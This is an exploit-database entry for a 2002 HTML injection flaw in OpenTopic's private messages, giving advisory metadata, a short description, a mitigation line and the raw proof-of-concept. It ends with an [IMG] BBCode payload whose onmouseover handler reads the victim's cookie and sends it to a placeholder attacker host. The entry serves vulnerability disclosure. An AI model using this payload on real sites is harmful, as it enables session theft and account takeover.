Vendor: OpenTopic
By: SecurityFocus
CVSS: 7.5 (HIGH)
HTML Injection
CWE: 79
Product Name: OpenTopic
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

HTML Injection Vulnerability in OpenTopic

An HTML injection vulnerability has been reported for OpenTopic. It exists because OpenTopic does not sufficiently sanitize HTML code in private message posts. When a victim views a private message containing malicious HTML, that code is executed in the victim's web browser in the security context of the site. Exploitation may allow theft of cookie-based authentication credentials or other attacks.

Mitigation:

Ensure that all user-supplied input is properly sanitized and validated before being used in the application.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6523/info

[IMG]http://[website]/img.gif"width="750"height="750"onmouseover="
a=document['coo'+'kie'];location='http://[attacker]/?'+a;[/IMG]